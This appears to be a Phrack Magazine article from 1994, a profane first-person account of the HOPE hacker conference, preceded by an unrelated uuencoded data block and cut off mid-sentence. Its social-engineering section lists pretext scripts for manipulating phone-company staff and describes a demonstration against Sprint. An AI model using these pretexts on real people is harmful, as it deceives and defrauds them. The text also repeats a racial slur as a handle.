M]JY^[3-TRCU(_6LE\;-/LE?%+MQ6I`H2M/P]X<N/$>H+96LD22$9!D)`_0&HI
MG-0BY/H5&/,[(]"T[X*V]JOF7]Z;E@`VQ`44#N,]3^E:]EI%IHY,5K;PQ``@Z
ME%P3CU/?\:\6IBY5[I:(]*G05+5[EW2=-DUI1)'Y<49X4]\^XQ_6M.#P=;&`2
M,[F5F!YD&1U].E9.7)H:;EL-!80^0(L%!DE>GX"JXG\R42/PZ'<K@9P/3%3JN
M%C:M--C+1W3;MTK!"=YP<G'W>@JY>:8Z,0\D1A&!L\O)_P"^L^WI67-<NUBM$
M'>R:/"QPC!FXPO3_`#ZU9MKZ6[C+2A#&5(V[3_CC'M1YA8U--B46J81(U!X\K
MM=OOTKB&O?L?C_4I\9:*R"+Q_>D_^M6E)[D3Z',ZY\44:Z:T^S22.'PRE51'5
M]B1DXK.?1;_4IVNE:TL$N'WD0;F)/OG`_2NR%)4DG+J92GSNR+</P_T_R7N)R
M&DN"G)\PXS]`.*T-)GN-`9K?3I3;IC+*G"G/MTJW5<U8CD4=2U<:C>74D:7#H
MK(X)P>GZXS21#SXRH[#O_P#6J-$AD<]Q%&LJE&4JI+$'/OQ6`+J;6IVAMI&MU
MH1P3N)8CG_"M81ZLENVA;C%OIT0BL80LAX,DG))]:W=%\*0PD7%XPN93R`?NV
DK]*<IN*OU81C<WEB"384D*!G;U%.GA<%2K#!)SG\JQB:`/_9Z
``
end
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 23 of 28
****************************************************************************
Cyber Christ Bites The Big Apple
HOPE - Hackers On Planet Earth,
New York City - August 13-14, 1994
(C) 1994 Winn Schwartau
by Winn Schwartau
(This is Part II of the ongoing Cyber Christ series. Part I,
"Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July 22-24,
1994 is available all over the 'Net.)
Las Vegas is a miserable place, and with a nasty cold no less; it
took me three weeks of inhaling salt water and sand at the beach
to finally dry up the post nasal drip after my jaunt to DefCon
II. My ears returned to normal so that I no longer had to answer
every question with an old Jewish man's "Eh?" while fondling my
lobes for better reception.
New York had to be better.
Emmanuel Goldstein -aka Eric Corely - or is it the other way
around? is the host of HOPE, Hackers on Planet Earth, a celebra
tion of his successfully publishing 2600 - The Hackers Quarterly
for ten years without getting jailed, shot or worse. For as
Congressman Ed Markey said to Eric/Emmanuel in a Congressional
hearing last year, and I paraphrase, 2600 is no more than a
handbook for hacking (comparable obviously to a terrorist hand
book for blowing up the World Trade Center) for which Eric/Emman
uel should be properly vilified, countenanced and then drawn and
quartered on Letterman's Stupid Pet Tricks.
Ed and Eric/Emmanuel obviously have little room for negotiation
and I frankly enjoyed watching their Congressional movie where
communication was at a virtual standstill: and neither side
understood the viewpoints or positions of the other.
But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York,
and HOPE will take place in the Hotel Filthadelphia, straight
across the street from Pennsylvania Station in beautiful downtown
fast-food-before-they-mug-you 34th street, right around the
corner from clean-the-streets-its-Thanksgiving Herald Square.
Geography notwithstanding, HOPE promised to be a more iconoclas
tic gathering than that of DefCon II.
First off, to set the record straight, I am a New Yorker. No
matter that I escaped in 1981 for the sunny beaches of California
for 7 years, and then moved to the Great State of the Legally
Stupid for four more (Tennessee); no matter that I now live on
the Gulf Coast of Florida where the water temperature never dips
below a chilly 98 degrees; I am and always will be a New Yorker.
It took me the better part of a decade of living away from New
York to come to that undeniable and inescapable conclusion: Once
a New Yorker, always a New Yorker. Not that that makes my wife
any the happier.
"You are so rude. You love to argue. Confrontation is your
middle name." Yeah, so what's your point?
You see, for a true New Yorker these aren't insults to be re-
regurgitated at the mental moron who attempts to combat us in a
battle of wits yet enters the ring unarmed; these are mere tru
isms as seen by someone who views the world in black and white,
not black, white and New York.
Case in point.
I used to commute into Manhattan from the Westchester County
suburb of Ossining where I lived 47 feet from the walls of Sing
Sing prison (no shit!). Overlooking the wide expanse of the
Hudson River from my aerie several hundred feet above, the only
disquieting aspect of that location were the enormously deafening
thunderclaps which resounded a hundred and one times between the
cliffs on either side of the river. Then there was the occasion
al escapee-alarm from the prison. .
So, it was my daily New York regimen to take the 8:15 into the
city. If the train's on time I'll get to work by nine . . .
Grand Central Station - the grand old landmark thankfully saved
by the late Jackie O. - is the nexus for a few hundred million
commuters who congregate in New York Shitty for no other reason
that to collect a paycheck to afford blood pressure medicine.
You have to understand that New York is different. Imagine,
picture in your mind: nothing is so endearing as to watch thou
sands of briefcase carrying suits scrambling like ants in a Gary
Larson cartoon for the nearest taxi, all the while greeting their
neighbors with the prototypical New York G'day!
With both fists high in the air, middle fingers locked into erect
prominence, a cacophonous chorus of "Good Fucking Morning"
brightens the day of a true New Yorker. His bloodshot eyes
instantly clear, the blood pressure sinks by 50% and already the
first conflict of the day has been waged and won.
Welcome to the Big Apple, and remember never, ever, to say, "Have
a Nice Day." Oh, no. Never.
So HOPE was bound to be radically different from Vegas's DefCon
II, if only for the setting. But, I expected hard core. The
European contingent will be there, as will Israel and South
America and even the Far East. All told, I am told, 1000 or more
are expected. And again, as at DefCon II, I am to speak, but
Eric/Emmanuel never told me about what, when, or any of the other
niceties that go along with this thing we call a schedule.
* * * * *
God, I hate rushing.
Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their
hands" three hour trip to New York is not for the faint of heart.
My rented Hyundai four cylinder limousine wound up like a sewing
machine to 9,600 RPM and hydroplaned the bone dry route 66 into
the pot holed, traffic hell of Friday afternoon Washington, DC.
Twelve minutes to spare.
I made the 23 mile trip is something less than three minutes and
bounded into the Budget rental return, decelerated to impulse
power and let my brick and lead filled suitcase drop to the
pavement with a dent and a thud. "Send me the bill," I hollered
at the attendant. Never mind that Budget doesn't offer express
service like real car rental companies. "Just send me the bill!"
and I was off.
Eight minute to spare. Schlepp, schlepp. Heavy, heavy.
Holy shit! Look at the line for tickets and I had reservations.
"Is this the line for the four o'clock to New York?" Pant,
breathless.
"Yeah." She never looked up.
"Will they hold the train?"
"No." A resoundingly rude no at that. Panic gene takes over.
"What about the self-ticketing computer?" I said pointing at the
self ticketing computer.
"Do you have a reservation?"
"Yup." Maybe there is a God.
"Won't help you."
"What?"
Nothing.
"What do you mean won't help?"
"Computer's broken." Criminy! I have 4 minutes and here's this
over-paid over-attituded Amtrak employee who thinks she's the
echo of Whoopi Goldberg. "The line's over there."
Have you ever begged? I mean really begged? Well I have.
"Are you waiting for the four?" "Can I slip ahead?" "Are you in
a death defying hurry?" "I'll give you a dime for your spot in
line." "You are so pretty for 76, ma'am. Can I sneak ahead?"
Tears work. Two excruciating minutes to go. I bounced ahead of
everyone in a line the length of the Great Wall of China, got my
tickets and tore ass through Union Station The closing gate
missed me but caught the suitcase costing me yet more time as I
attempted to disgorge my now-shattered valise from the fork-lift-
like spikes which protect the trains from late-coming commuters.
The rubber edged doors on the train itself were kinder and gen
tler, but at this point, screw it. It was Evian and Fritos for
the next three hours.
* * * * *
Promises tend to be lies. The check is in the mail; Dan Quayle
will learn to spell; I won't raise taxes. I wonder about HOPE.
"It's going to be Bust Central," said one prominent hacker who
threatened me with electronic assassination if I used his name.
"Emmanuel will kill me." Apparently the authorities-who-be are
going to be there in force. "They want to see if Corrupt or any
of the MoD crew stay after dark, then Zap! Back to jail. (gig
gle, giggle.) I want to see that."
Will Mitnick show up? I'd like to talk to that boy. A thousand
hackers in one place and Eric/Emmanuel egging on the Feds to do
something stupid. Agent Steal will be there, or registered at
least, and half of the folks I know going are using aliases.
"I'd like a room please."
"Yessir. Name?"
"Monkey Meat."
"Is that your first or last name?"
"First."
"Last name?"
"Dilithium Crystal."
"Could you spell that?"
Now: I know the Hotel Pennsylvania. It used to be the high
class Statler Hilton until Mr. Hilton himself decided that the
place was beyond hope. "Sell it or scuttle it." They sold and
thus begat the hotel Filthadelphia. I stayed here once in 1989
and it was a cesspool then. I wondered why the Farsi-fluent
bellhop wouldn't tell me how bad the damage was from the fire
bombed 12th floor. The carpets were the same dingy, once upon a
time colorful, drab as I remembered. And, I always have a bit of
trouble with a hotel who puts a security check by the elevator
bank. Gives you the warm and fuzzies that make you want to come
back right away.
I saved $2 because none of the bell hops noticed I needed help,
but then again, it wouldn't have mattered for there was no way he
and I and my luggage were going to fit inside of what the hotel
euphemistically refers to as a 'room'. Closet would be kind but
still inaccurate. I think the word, ah, '$95 a night slum' might
still be overly generous. Let's try . . . ah ha! the room that
almost survived the fire bombing. Yeah, that's the ticket.
The walls were pealing. Long strips of yellowed antique wall
paper embellished the flatness of the walls as they curled to
wards the floor and windows. The chunks of dried glue decorated
the pastel gray with texture and the water stains from I know not
where slithered their way to the soggy carpet in fractal pat
terned rivulets. I stood in awe at early funk motif that the
Hotel Filthadelphia chose in honor of my attendance at HOPE.
But, no matter how bad my room was, at least it was bachelor
clean. (Ask your significant other what that means. . .)
In one hacker's room no bigger than mine I counted 13 sleeping
bags lying amongst the growing mold at the intersection of the
drenched wallboard and putrefying carpet shreds. (God, I love
going to hacker conferences! It's not that I like Hyatt's and
Hilton' all that much: I do prefer the smaller facilities, but, I
am sad to admit, clean counts at my age.). My nose did not have
to venture towards the floor to be aware that the Hotel Filtha
delphia was engaging in top secret exobiological government
experiments bent on determining their communicability and infec
tion factor.
The top floor of the Hotel Filthadelphia - the 18th - was the
place for HOPE, except the elevator door wouldn't open. The
inner door did, but even with the combined strength of my person
al crowbar (a New York defensive measure only; I never use it at
home) and three roughians with a bad case of Mexican Claustropho
bia, we never got the door open.
The guard in the lobby was a big help.
"Try again."
Damned if he didn't know his elevators and I emerged into the
pre-HOPE chaos of preparing for a conference.
About 100 hackers lounged around in varying forms of disarray -
Hey Rop!
Rop Gongrijjp editor of the Dutch Hacktic is a both a friend and
an occasional source of stimulating argument. Smart as a whip, I
don't always agree with him, though, the above-ground security
types ought to talk to him for a clear, concise and coherent
description of the whys and wherefores of hacking.
Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to
lots of folks. Is that you Supernigger? And Julio? I was sur
prised. I knew a lot more of these guys that I thought I did.
Some indicted, some unindicted, some mere sympathizers and other
techno-freaks who enjoy a weekend with other techno-freaks.
Security dudes - get hip! Contact your local hacker and make
friends. You'll be glad you did.
>From behind - got me. My adrenaline went into super-saturated
mode as I was grabbed. I turned and it was . . . Ben. Ben is a
hugger. "I just wanted to hug you," he said sweetly but without
the humorous sexually deviant connotation that occurred during
Novocain's offer to let Phil Zimmerman sleep with him in Las
Vegas.
I smiled a crooked smile. "Yeah, right." Woodstock '94 was a
mere 120 miles away . . .maybe there was a psychic connection.
But Ben was being sincere. He was hugging everyone. Everyone.
At 17, he really believes that hugging and hacking are next to
Godliness. Boy does he have surprise coming the first time his
mortgage is late. Keep hugging while you have the chance, Ben.
Assorted cases of Zima (the disgusting Polish is-this-really-lime
flavored beer of choice by those without taste buds) appeared,
but anyone over the age of 21 drank Bud. What about the 12 year
olds drinking? And the 18 year olds? And the 16 year olds?
"Rop, I don't think you need to give the hotel an excuse to bust
you guys outta here." Me, fatherly and responsible? Stranger
things have happened. The beer was gone. I'm not a teetotaler,
but I didn't want my weekend going up in flames because of some
trashed 16 year old puking on an Irani ambassador in the lobby.
No reason to test fate.
* * * * *
Nothing worked, but that's normal.
Rop had set up HEU (Hacking at the End of the Universe) in
Holland last year with a single length of 800m ethernet. (That's
meter for the Americans: about 2625 ft.) HOPE, though was dif
ferent. The Hotel Filthadelphia's switchboard and phone systems
crashed every half hour or so which doesn't do a lot for the
health of 28.8 slip lines.
The object of the exercise was seemingly simple: plug together
about 20 terminals into a terminal server connected to Hope.Com
and let 'em go at it. Provide 'net access and, to the lucky
winner of the crack-the-hopenet server (root) the keys to a 1994
Corvette!
You heard it right! For breaking into root of their allegedly
secure server, the folks at 2600 are giving away keys to a 1994
Corvette. They don't know where the car is, just the keys. But
they will give you the car's last known location . . . or was it
$50 in cash?
Erikb - Chris Goggans - showed up late Friday night in disguise:
a baseball cap over his nearly waist length dirty blond hair.
"He's here!" one could hear being muttered. "He had the balls to
show up!" "He's gonna get his ass kicked to a pulp." "So you
did come . . . I was afraid they'd intimidated you to stay in
Texas."
No way! "Why tell the enemy what your plans are." Even the 50's-
something ex-amphetamine-dealer turned reseller of public-records
Bootleg didn't know Goggans was going to be there. But the
multiple fans of Erikb, (a strong resemblance to Cyber Christ if
he do say so himself) were a-mighty proud to see him.
This stunning Asian girl with skin too soft to touch (maybe she
was 14, maybe she was 25) looked at Erikb by the message board.
"You're," she pointed in disbelief "Erikb?" Chris nods, getting
arrogantly used to the respectful adulation. Yeah, that's me, to
which the lady/girl/woman instantly replied, "You're such an
asshole." Smile, wide smile, hug, kiss, big kiss. Erikb revels
in the attention and hundreds of horny hackers jealously look on.
Friday night was more of an experience - a Baba Ram Dass-like Be
Here Now experience - with mellow being the operative word. The
hotel had apparently sacrificed 20,000 square feet of its pent
house to hackers, but it was obvious to see they really didn't
give a damn if the whole floor got trashed. Ceiling panels
dripped from their 12 foot lofts making a scorched Shuttle under
belly look pristine. What a cesspool! I swear nothing had been
done to the decorative environs since the day Kennedy was shot.
But kudos to Emmanuel for finding a centrally located cesspool
that undoubtedly gave him one hell of a deal. I think it would be
a big mistake to hold a hacker conference at the Plaza or some
such snooty overly-self-indulgent denizen of the rich.
Filth sort of lends credibility to an event that otherwise seeks
notoriety.
I didn't want to take up too much of Emmanuel's and Rop's time -
they were in setup panic - so it was off to the netherworld until
noon. That's when a civilized Con begins.
* * * * *
I dared to go outside; it was about 11AM and I was in search of
the perfect New York breakfast: a greasy spoon that serves coffee
as tough as tree bark and a catatonia inducing egg and bacon
sandwich. Munch, munch, munch on that coffee.
I'd forgotten how many beggars hang out on the corner of 33rd and
7th, all armed with the same words, "how about a handout, Winn?"
How the hell do they know my name? "Whatever you give will come
back to you double and triple . . . please man, I gotta eat." It
is sad, but John Paul Getty I ain't.
As I munched on my coffee and sipped my runny egg-sandwich I
noticed that right in front of the runny-egg-sandwich place sat a
Ford Econoline van. Nice van. Nice phone company van. What are
they doing here? Oh, yeah, the hackers need lines and the switch
board is down. Of course, the phone company is here. But,
what's that? Hello? A Hacker playing in the phone van? I recog
nize you! You work with Emmanuel. How? He's robbing it. Not
robbing, maybe borrowing.
The ersatz telephone van could have fooled anyone - even me, a
color blind quasi-techno-weanie to yell "Yo! Ma Bell!" But, upon
not-too-closer inspection, the TPC (The Phone Company) van was in
fact a 2600 van - straight from the minds of Emmanuel and
friends. Impeccable! The telephone bell in a circle logo is, in
this case, connected via cable to a hacker at a keyboard. The
commercial plates add an additional air of respectability to the
whole image. It works.
* * * * *
Up to HOPE - egg sandwich and all.
The keynote speech was to be provided courtesy of the Man in
Blue. Scheduled for noon, things were getting off to a late
start. The media (who were there in droves, eat your heart out
CSI) converged on the MIB to see who and why someone of his
stature would (gasp!) appear/speak at a funky-downtown hotel
filled with the scourges of Cyberspace. I didn't see if Ben
hugged the MIB, but I would understand if he didn't. Few people
knew him or suspected what size of Jim-Carey-MASK arsenal might
suddenly appear if a passive hug were accidentally interpreted as
being too aggressive. The MIB is imposing and Ben too shy.
The media can ask some dumb questions and write some dumb arti
cles because they spend 12 1/2 minutes trying to understand an
entire culture. Can't do that fellows!
The MIB, though, knows hackers and is learning about them more
and more; and since he is respectable, the media asks him about
hackers. What are hackers? Why are YOU here, Mr. MIB?
"Because they have a lot to offer. They are the future," the Man
In Blue said over and over. Interview after interview - how time
flies when you're having fun - and the lights and cameras are
rolling from NBC and PIX and CNN and assorted other channels and
magazines. At 12:55 chaos had not settled down to regimented
disorganization and the MIB was getting antsy. After all, he was
a military man and 55 minutes off schedule: Egad! Take charge.
The MIB stood on a chair and hollered to the 700+ hacker phreaks
in the demonstration ballroom, "Hey! It's starting. Let's go the
theater and get rocking! Follow me." He leaned over to me: "Do
you know where the room is?"
"Sure, follow me."
"Everyone follow, c'mon," yelled the MIB. "I'm going to get
started in exactly three minutes," and three minutes he meant.
Despite the fact that I got lost in a hallway and had hundreds of
followers following my missteps and the MIB yelling at me for
getting lost in a room with only two doors, we did make the main
hall, and within 90 seconds he took over the podium and began
speaking.
"I bet you've always wanted to ask a spy a few questions. Here's
your chance. But let me say that the United States intelligence
community needs help and you guys are part of the solution." The
MIB was impeccably dressed in his pin stripe with only traces of
a Hackers 80 T-shirt leaking through his starched white dress
shirt. The MIB is no less than Robert Steele, ex-CIA type spy,
senior civilian in Marine Corps Intelligence and now the Presi
dent of Open Source Solutions, Inc.
He got these guys (and gals) going. Robert doesn't mince words
and that's why as he puts it, he's "been adopted by the hackers."
At his OSS conferences he has successfully juxtaposed hackers and
senior KGB officials who needed full time security during their
specially arranged 48 hour visa to Washington, DC. He brought
Emmanuel and Rop and clan to his show and since their agendas
aren't all that different, a camaraderie was formed.
Robert MIB Steele believes that the current intelligence machin
ery is inadequate to meet the challenges of today's world. Over
80% of the classified information contained with the Byzantine
bowels of the government is actually available from open sources.
We need to realize that the future is more of an open book than
ever before.
We classify newspaper articles from Peru in the incredibly naive
belief that only Pentagon spooks subscribe. We classify BBC
video tapes from the UK with the inane belief that no one will
watch it if it so stamped. We classify $4 Billion National
Reconnaissance Office satellite generated street maps of Calle,
Colombia when anyone with an IQ only slightly above a rock can
get the same one from the tourist office. And that's where
hackers come in.
"You guys are a national resource. Too bad everyone's so scared
of you." Applause from everywhere. The MIB knows how to massage
a crowd. Hackers, according to Steele, and to a certain extent I
agree, are the truth tellers "in a constellation of complex
systems run amok and on the verge of catastrophic collapse."
Hackers are the greatest sources of open source information in
the world. They have the navigation skills, they have the time,
and they have the motivation, Robert says. Hackers peruse the
edges of technology and there is little that will stop them in
their efforts. The intelligence community should take advantage
of the skills and lessons that the hackers have to teach us, yet
as we all know, political and social oppositions keep both sides
(who are really more similar then dissimilar) from talking.
"Hackers put a mirror up to the technical designers who have
built the networks, and what they see, they don't like. Hackers
have shown us all the chinks in the armor of a house without
doors or windows. The information infrastructure is fragile and
we had better do something about it now; before it's too late."
Beat them at their own game, suggests Steele. Keep the doors of
Cyberspace open, and sooner or later, the denizens of the black
holes of information will have to sooner or late realize that the
cat is out of the bag.
Steele educated the Hacker crowd in a way new to them: he treat
ed them with respect, and in turn he opened a channel of dialog
that few above ground suit-types have ever envisioned. Steele
works at the source.
HOPE had begun and Robert had set the tone.
* * * * *
The day was long. Dogged by press, hackers rolled over so the
reporters could tickle their stomachs on camera. Despite their
public allegations that the media screws it up and never can get
the story right, a camera is like a magnet. The New York Times
printed an article about HOPE so off the wall I wondered if the
reporter had actually been there. Nonetheless, the crowds fol
lowed the cameras, the cameras followed the crowds, and the
crowds parted like the Red Sea. But these were mighty colorful
crowds.
We all hear of that prototypical image of the acne faced, Jolt-
drinking, pepperoni downing nerdish teenager who has himself
locked in the un-air-conditioned attic of his parents' half
million dollar house from the time school gets out till the sun
rises. Wrongo security-breath. Yeah, there's that component, but
I was reminded of the '80's, the early '80's by a large percent
age of the crowd.
Purple hair was present but scarce, and I swear on a stack of
2600's that Pat from Saturday Night Live was there putting every
one's hormonal guess-machines to the test. But what cannot help
but capture one's attention is a 40 pin integrated circuit in
serted into the shaved side skull of an otherwise clean-cut
Mohawk haircut.
The story goes that Chip Head went to a doctor and had a pair of
small incisions placed in his skull which would hold the leads
from the chip. A little dab of glue and in a few days the skin
would grow back to hold the 40 pins in the natural way; God's
way.
There was a time that I thought ponytails were 'out' and passe,
but I thought wrong. Mine got chopped off in roughly 1976 down
to shoulder length which remained for another six years, but half
of the HOPE audience is the reason for wide spread poverty in the
hair salon industry.
Nothing wrong with long, styled, inventive, outrageous hair as
long as it's clean; and with barely an exception, such was the
case. In New York it's not too hard to be perceived as clean,
especially when you consider the frame of reference. Nothing is
too weird.
The energy level of HOPE was much higher than the almost lethar
gic (but good!) DefCon II. People move in a great hurry, perhaps
to convey the sense of importance to others, or just out of
frenetic hyperactivity. Hackers hunched over their keyboards -
yet with a sense of urgency and purpose. Quiet yet highly animat
ed conversations in all corners. HOPE staff endlessly pacing
throughout the event with their walkie-talkies glued to their
ears.
Not many suit types. A handful at best, and what about the Feds?
I was accosted a few times for being a Fed, but word spread: no
Fed, no bust. Where were the Feds? In the lobby. The typical
NYPD cop has the distinctive reputation of being overweight
especially when he wearing two holsters - one for the gun and one
for the Italian sausage. Perpetually portrayed as donut dunking
dodo's, some New York cops' asses are referred to as the Fourth
Precinct and a few actually moonlight as sofas.
So rather than make a stink, (NY cops hate to make a scene) the
lobby of the Hotel Filthadelphia was home to the Coffee Clutch
for Cops. About a half dozen of them made their profound
presence known by merely spending their day consuming mass quan
tities of questionable ingestibles, but that was infinitely
preferable to hanging out on the 18th floor. The hackers weren't
causing any trouble, the cops knew that, so why push it. Hackers
don't fight, they hack. Right?
After hours of running hours behind schedule, the HOPE conference
was in first place for disorganized, with DefCon II not far
behind. Only with 1000 people to keep happy and in the right
rooms, chaos reigns sooner. The free Unix sessions and Pager
session and open microphone bitch session and the unadulterated
true history of 2600 kept audiences of several hundred hankering
for more - hour after hour.
Over by the cellular hacking demonstrations, I ran into a hacker
I had written about: Julio, from the almost defunct Masters of
Destruction. Julio had gone state's evidence and was prepared to
testify against MoD ring leader Mark Abene (aka Phiber Optik) but
once Mark pled guilty to enough crimes to satisfy the Feds, Julio
was off the hook with mere probation. Good guy, sworn off of
hacking. Cell phones are so much more interesting.
However, while standing around with Erikb and a gaggle of Cyber
Christ wanna-bes, Julio and his friend (who was the size of Texas
on two legs) began a pushing match with Goggans. "You fucking
narc red-neck son of a bitch." Goggans helped build the case
against the MoD and didn't make a lot of friends in the process.
The shoving and shouldering reminded me of slam dancing from
decades past, but these kids are too young to have taken part in
the social niceties of deranged high speed propulsion and revul
sion on the dance floor. So it was a straight out pushing match,
which found Erikb doing his bloody best to avoid. Julio and pal
kept a'coming and Erikb kept avoiding. It took a dozen of us to
get in the middle and see that Julio was escorted to the eleva
tors.
Julio said Corrupt, also of the MoD, was coming down to HOPE,
too. Corrupt has been accused of mugging drug dealers to finance
his computer escapades, and was busted along with the rest of the
MoD gang. The implied threat was taken seriously, but, for
whatever reason, Corrupt never showed. It is said that the
majority of the hacking community distances itself from him; he's
not good for the collective reputation. So much for hacker
fights. All is calm.
The evening sessions continued and continued with estimates of as
late as 4AM being bandied about. Somewhere around 1:00AM I ran
into Bootleg in the downstairs bar. Where was everybody? Not
upstairs. Not in the bar. I saw a Garbage Heap in the street
outside (now that's a double entendre) and then Goggans popped up
from the door of the Blarney Stone, a syndicated chain of low-
class Irish bars that serve fabulously thick hot sandwiches.
"We're about to get thrown out."
"From the Blarney Stone? That's impossible. Drunks call the
phone booths home!"
Fifty or so hacker/phreaks had migrated to the least likely, most
anachronistic location one could imagine. A handful of drunken
sots leaning over their beers on a stain encrusted wooden breed
ing ground for salmonella. A men's room that hasn't seen the
fuzzy end of a brush for the best part of a century made Turkish
toilets appear refreshingly clean. And they serve food here.
I didn't look like a hacker so I asked the bartender, "Big crowd,
eh?"
The barrel chested beer bellied barman nonchalantly replied,
"nah. Pretty usual." He cleaned a glass so thoroughly the water
marks stood out plainly.
"Really? This much action on a Saturday night on a dark side
street so questionably safe that Manhattan's Mugger Society posts
warnings?"
"Yup."
"So," I continued. "These hackers come here a lot?"
"Sure do," he said emphatically.
"Wow. I didn't know that. So this is sort of a hacker bar, you
might say?"
"Exactly. Every Saturday night they come in and raise a little
hell."
With a straight face I somehow managed to thank the confused
barman for his help and for the next four hours learned that
socially, hackers of today are no different than many if not most
of us were in our late teens ad early twenties. We laughed and
joked and so do they - but there is more computer talk. We
decried the political status of our day as they do theirs, albeit
they with less fervor and more resignation. The X-Generation
factor: most of them give little more than a tiny shit about
things they view as being totally outside their control, so why
bother. Live for today.
Know they enemy. Robert hung in with me intermingling and argu
ing and debating and learning from them, and they from us.
Hackers aren't the enemy - their knowledge is - and they are not
the exclusive holders of that information. Information Warfare
is about capabilities, and no matter who possesses that capabili
ty, there ought to be a corresponding amount respect.
Indeed, rather than adversaries, hackers could well become gov
ernment allies and national security assets in an intense inter
national cyber-conflict. In the LoD/MoD War of 1990-91, one
group of hackers did help authorities. Today many hackers assist
professional organizations, governments in the US and overseas -
although very quietly. 'Can't be seen consorting with the
enemy.' Is hacking from an Army or Navy or NATO base illegal?
Damned if I know, but more than one Cyber Christ-like character
makes a tidy sum providing hands-on hacking education to the
brass in Europe.
Where these guys went after 5AM I don't know, but I was one of
the first to be back at the HOPE conference later that day; 12:30
PM Sunday.
* * * * *
The Nazi Hunters were out in force.
"The Neo-Nazi skinheads are trying to start another Holocaust." A
piercing, almost annoying voice stabbed right through the crowds.
"Their racist propaganda advocates killing Jews and blacks. They
have to be stopped, now."
Mortechai Levy (I'll call him Morty) commanded the attention of a
couple dozen hackers. Morty was a good, emotional, riveting
shouter. "These cowardly bastards have set up vicious hate call
lines in over 50 cities. The messages advocate burning syna
gogues, killing minorities and other violence. These phones have
to be stopped!"
The ever-present leaflet from Morty's Jewish Defense Organization
asked for help from the 2600 population.
"Phone freaks you must use your various assorted bag of
tricks to shut these lines down. No cowardly sputterings
about 'free speech' for these fascist scum."
The headline invited the hacker/phreak community to:
"Let's Shut Down 'Dial-A-Nazi'!!!"
Morty was looking for political and technical support from a band
of nowhere men and women who largely don't know where they're
going much less care about an organized political response to
someone elses cause. He wasn't making a lot of headway, and he
must have know that he would walk right into the anarchist's
bible: the 1st amendment.
The battle lines had been set. Morty wanted to see the Nazis
censored and hackers are absolute freedom of speechers by any
measure. Even Ben sauntering over for a group hug did little to
defuse the mounting tension.
I couldn't help but play mediator. Morty was belligerently loud
and being deafeningly intrusive which affected the on-going ses
sions. To tone it down some, we nudged Morty and company off to
the side and occupied a corner of thread bare carpet, leaning
against a boorish beige wall that had lost its better epidermis.
The heated freedom of speech versus the promotion of racial
genocide rancor subdued little even though we were all buns side
down. I tried to get a little control of the situation.
"Morty. Answer me this so we know where you're coming from. You
advocate the silencing of the Nazis, right?
"They're planning a new race war; they have to be stopped."
"So you want them silenced. You say their phones should be
stopped and that the hackers should help."
"Call that number and they'll tell you that Jews and blacks
should be killed and then they . . ."
"Morty. OK, you want to censor the Nazis. Yes or No."
"Yes."
"OK, I can understand that. The question really is, and I need
your help here, what is the line of censorship that you advocate.
Where is your line of legal versus censored?"
A few more minutes of political diatribe and then he got to the
point. "Any group with a history of violence should be censored
and stopped." A little imagination and suddenly the whole planet
is silenced. We need a better line, please. "Hate group, Nazis,
people who advocate genocide . . . they should be
silenced . . . ."
"So," I analyzed. "You want to establish censorship criteria
based upon subjective interpretation. Whose interpretation?"
My approach brought nods of approval.
One has to admire Morty and his sheer audacity and tenacity and
how much he strenuously and single-mindedly drives his points
home. He didn't have the ideal sympathetic audience, but he
wouldn't give an inch. Not an inch. A little self righteousness
goes a long way; boisterous extremism grows stale. It invites
punitive retorts and teasing, or in counter-culture jargon,
"fucking with their heads."
Morty (perhaps for justifiable reasons) was totally inflexible
and thus more prone to verbal barbing. "You're just a Jewish
racist. Racism in reverse," accused one jocular but definitely
lower middle class hacker with an accent thicker than all of
Brooklyn.
Incoming Scuds! Look out! Morty went nuts and as they say,
freedom of speech ends when my fists impacts upon your nose.
Morty came dangerously close to crossing that line. Whoah,
Morty, whoah. He's just fucking with your head. The calm-down
brigade did its level best to keep these two mortals at opposite
ends of the room.
"You support that Neo Nazi down there; you're as bad as the
rest!" Morty said. "See what I have to tolerate. I know him,
we've been keeping track of him and he hangs out with the son of
the Grand Wizard of Nazi Oz." The paranoid train got on the
tracks.
"Do you really know the Big Poo-bah of Hate?" I asked the hacker
under assault and now under protective custody.
"Yeah," he said candidly. "He's some dick head who hates every
one. Real jerk."
"So what about you said to Morty over there?"
"Just fucking with his head. He gets a little extreme." So we
had in our midst the Al Sharpton of the Jewish faith. Ballsy.
Since Morty takes Saturday's off by religious law, he missed the
press cavalcade, but as a radical New York fixture, the media
probably didn't mind too much.
I was off to sessions, Morty found new audiences as they came off
the elevators, and the band played on.
* * * * *
In my humble 40-something opinion, the best session of HOPE was
the one on social engineering.
The panel consisted of only Emmanuel, Supernigger (social engi
neer par excellence) and Cheshire Catalyst. The first bits were
pretty staid dry conventional conference (ConCon) oriented, but
nonetheless, not the kind of info that you expect to find William
H. Murray, Executive Consultant handing out.
The best social engineers make friends of their victims. Remem
ber: you're playing a role. Think Remington Steele.
Schmooze! "Hey, Jack did you get a load of the blond on Stern
last night?"
Justifiable anger: "Your department has caused nothing but head
aches. These damn new computers/phones/technology just don't
work like the old ones. Now either you help me now or I'm going
all the way to Shellhorn and we'll what he says about these kinds
of screwups." A contrite response is the desired effect.
Butt headed bosses: "Hey, my boss is all over my butt, can you
help me out?"
Management hatred: "I'm sitting here at 3PM working while man
agement is on their yachts. Can you tell me . . .?"
Giveaways: "Did you know that so and so is having an affair with
so and so? It's true, I swear. By the way, can you tell me how
to . . ."
Empathy: "I'm new, haven't been to the training course and they
expect me to figure this out all by myself. It's not fair."
Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah
passurt. Cunu help? Ah, tanku." Good for a quick exchange and a
quick good-bye. Carefully done, people want you off the phone
quickly.
Billsf, the almost 40 American phreak who now calls Amsterdam
home was wiring up Supernigger's real live demonstration of
social engineering against Sprint. A dial tone came over the PA
system followed by the pulses to 411.
"Directory Assistance," the operator's male voice was squeezed
into a mere three kilohertz bandwidth.
Suddenly, to the immense pleasure of the audience, an ear-split
ting screech a thousand times louder than finger nails on a chalk
board not only belched across the sound system but caused instant
bleeding in the ears of the innocent but now deaf operator. .
Billsf sheepishly grinned. "Just trying to wire up a mute
button."
Three hundred people in unison responded: "It doesn't work." No
shit.
While Billsf feverishly worked to regain his reputation, Super
nigger explained what he was going to do. The phone companies
have a service, ostensibly for internal use, called a C/NA. Sort
of a reverse directory when you have the number but want to know
who the number belongs to and from whence it comes. You can
